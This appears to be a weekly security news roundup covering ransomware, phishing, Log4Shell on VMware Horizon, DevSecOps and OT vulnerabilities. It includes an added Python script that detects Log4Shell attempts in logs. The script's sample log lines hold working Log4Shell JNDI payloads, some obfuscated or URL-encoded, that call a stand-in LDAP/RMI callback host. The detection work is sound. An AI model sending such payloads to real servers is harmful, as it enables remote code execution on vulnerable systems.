Review week: Log4Shell exploitation, DevSecOps myths, 56 vulnerabilities affecting OT devices


Here is an overview of some of the most interesting news, articles, interviews and videos from last week:

QNAP NAS devices hit by DeadBolt and ech0raix ransomware
Taiwan-based QNAP Systems is warning consumers and organizations using its network-attached storage (NAS) appliances of a new DeadBolt ransomware campaign.

Fake voicemail notifications are after Office365, Outlook credentials
A phishing campaign that uses fake voicemail notifications has been targeting, and is still targeting, various U.S.-based organizations in an attempt to obtain employees' Office365 and Outlook login credentials, Zscaler warned.

Attackers are still exploiting Log4Shell on VMware Horizon servers, CISA warns
If your organization runs VMware Horizon and Unified Access Gateway servers and you did not implement patches or workarounds to fix/mitigate the Log4Shell vulnerability (CVE-2021-44228) in December 2021, you should treat all those systems as compromised, the Cybersecurity and Infrastructure Security Agency (CISA) advised on Thursday.
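A practical first step before deciding whether a Horizon or UAG server was hit is to look for exploitation attempts in the logs that reached Log4j. The script below is an added example and is not code from CISA, VMware or the article: it normalizes URL encoding and the nested lookup tricks attackers used to dodge naive `${jndi:` string matches (`${lower:j}`, `${upper:...}` and the `${x:-default}` fallback syntax) and then flags any line that resolves to a JNDI lookup with one of the schemes seen in Log4Shell payloads. The log lines and the 198.51.100.0/24 callback addresses are constructed for the example; a real run would read Horizon, UAG or proxy logs instead.

```python
import re
import urllib.parse

# Schemes observed in Log4Shell (CVE-2021-44228) lookup payloads.
JNDI_SCHEMES = ("ldap", "ldaps", "rmi", "dns", "iiop", "corba", "nis", "nds")
JNDI_RE = re.compile(r"jndi:\s*(?:" + "|".join(JNDI_SCHEMES) + r")\s*:", re.I)

# One innermost ${...} lookup (no nested braces inside it).
_INNER = re.compile(r"\$\{([^{}]*)\}")


def _resolve(expr):
    """Evaluate one innermost lookup the way an obfuscated payload expects Log4j to."""
    kind, _, arg = expr.partition(":")
    k = kind.lower()
    if k == "jndi":
        return expr                      # keep the lookup itself visible to the detector
    if ":-" in expr:
        return expr.split(":-", 1)[1]    # ${x:-default} yields default; abused as ${::-j}
    if k == "lower":
        return arg.lower()
    if k == "upper":
        return arg.upper()
    return expr                          # unknown lookup: leave its text in place


def normalize(line, max_rounds=25):
    """Undo URL encoding and collapse nested lookups until the text stops changing."""
    s = urllib.parse.unquote(line)
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve(m.group(1)), s)
        if new == s:
            break
        s = new
    return s


def scan(lines):
    """Return (line_number, resolved_payload) for each line that decodes to a JNDI lookup."""
    hits = []
    for n, raw in enumerate(lines, 1):
        norm = normalize(raw)
        m = JNDI_RE.search(norm)
        if m:
            payload = re.match(r'[^\s"]*', norm[m.start():]).group(0)
            hits.append((n, payload))
    return hits


# Constructed access-log lines for the example (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Jun/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [24/Jun/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [24/Jun/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://198.51.100.23:1389/b}"',
    '10.0.0.9 - - [24/Jun/2022:10:01:11 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://198.51.100.23:1389/c}"',
    '10.0.0.9 - - [24/Jun/2022:10:01:13 +0000] '
    '"GET /portal/?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.23%3A1099%2Fd%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '10.0.0.12 - - [24/Jun/2022:10:01:15 +0000] "GET /docs/log4j-${version} HTTP/1.1" 404 10 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line_no, payload in scan(SAMPLE_LOG):
        print(f"line {line_no}: {payload}")
```

A hit on a host that was unpatched at the time is what CISA's advice turns on: the callback host in the resolved payload is the indicator to hunt for in outbound connection logs, and the absence of hits in the logs you happen to have does not clear the server. The normalizer only covers the lookup forms listed above; it is a triage aid, not a substitute for patching or rebuilding.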

Board members and the C-suite need secure communication tools
Board members and the C-suite are prime targets for cyber threat actors because of their access to highly sensitive information. Yet too many of them put their organizations at risk through the daily use of personal email to communicate on sensitive topics.

After being breached once, many companies are likely to be hit again
Cymulate announced the results of a survey showing that two-thirds of companies hit by cybercrime last year were hit more than once, with nearly 10% experiencing 10 or more attacks in one year.

How the blurring of the “supply chain” opens your doors to attackers — and how you can close them
There have been more than 200 targeted supply chain attacks in the past decade. Some of these campaigns have affected countless supplier networks and millions of customers, with SolarWinds, Kaseya and the recent Log4j debacle being the best-known examples.

The price of stolen information: Everything is sold on the dark web
Privacy Affairs researchers concluded that criminals on the dark web only need to spend $1,115 for a complete set of a person's account details, enough to create fake IDs and forge private documents such as passports and driver's licenses.

7 myths of DevSecOps and how to overcome them
By integrating security processes and following end-to-end automation, businesses can secure software throughout the software supply chain, significantly improve the developer experience, and accelerate safer delivery. To achieve this, businesses need to overcome the seven common myths of DevSecOps that keep them from making the change.

How to keep your NFTs safe from scammers
According to Wikipedia, the first known non-fungible token (NFT) was created in 2014 and the first NFT project was launched in late 2015. It took several years and more projects for the concept to trickle into the consciousness of the general public, and a few more for large investments in NFTs to follow.

How to properly use and manage Kubernetes in production
In this video for Help Net Security, Alex Jones, Director of Kubernetes Engineering at Canonical, talks about the proper use and management of Kubernetes in production.

Automotive hose manufacturer hit by ransomware, shut down production control system
A U.S. subsidiary of Nichirin Co., a Japan-based company that makes and sells automotive hoses and hose parts, was hit by ransomware, resulting in the closure of the subsidiary’s network and production control system.

Data recovery depends on how good your backup strategy is
99% of surveyed IT decision makers say they have backup strategies in place, but 26% admit they cannot fully restore all data/documents when recovering from a backup, according to an annual survey conducted in April 2022 by Apricorn.

Researchers reveal 56 vulnerabilities affecting thousands of OT devices
In this video for Help Net Security, Daniel dos Santos, Head of Security Research at Forescout, discusses 56 vulnerabilities affecting ten vendors, including Bently Nevada, Emerson, Honeywell, JTEKT, Motorola, Omron, Phoenix Contact, Siemens, and Yokogawa.

The solution to the cybersecurity skills gap largely depends on hiring practices
(ISC)² has published findings from its 2022 Cybersecurity Hiring Managers research that shed light on best practices for recruiting, hiring and onboarding entry- and junior-level cybersecurity practitioners.

Inside a large-scale phishing campaign targeting millions of Facebook users
In this video for Help Net Security, Nick Ascoli, VP of Threat Research, PIXM, discusses a massive phishing campaign that successfully stole an estimated five million Facebook accounts.

What are the benefits of passwordless authentication?
In this video for Help Net Security, Christofer Hoff, Chief Secure Technology Officer at LastPass, talks about the benefits of passwordless authentication.

iPaaS: The latest enterprise cybersecurity risk?
In this video for Help Net Security, Alon Jackson, CEO of Astrix Security, talks about how, as third-party platforms proliferate and linking data and workflows between them becomes easier, cybersecurity solutions need to keep pace.

Webinar: What is trending in email security?
In this webcast, Sarah Happé, Echoworx's Director of Client Engagement, and Forrester Senior Analyst Jess Burn dive into how security leaders use email security to challenge the status quo and build customer trust and business revenue.

Photos: Infosecurity Europe 2022, part 1
Infosecurity Europe 2022 has now opened its doors at ExCeL in London. Here's a look at the event; the featured vendors are: Arctic Wolf Networks, Bridewell, Checkmarx, Cisco, CrowdStrike, Cybereason, Hornetsecurity, (ISC)², Mimecast, Netskope, OneTrust, and Splunk.

Photos: Infosecurity Europe 2022, part 2
It's the second day of Infosecurity Europe 2022 at ExCeL in London. Here's a look at the event; the featured vendors are: Akamai, SecurityScorecard, Edgescan, ManageEngine, Securonix, F5, ServiceNow, and Vade.

Infosecurity Europe 2022 video walkthrough
Infosecurity Europe 2022 has now opened its doors at ExCeL in London. Here's a look inside the event.

New infosec products of the week: June 24, 2022
Here’s a look at the most interesting products from last week, featuring releases from Arcserve, Cavelo, ComplyCube, CompoSecure, and Hillstone Networks.
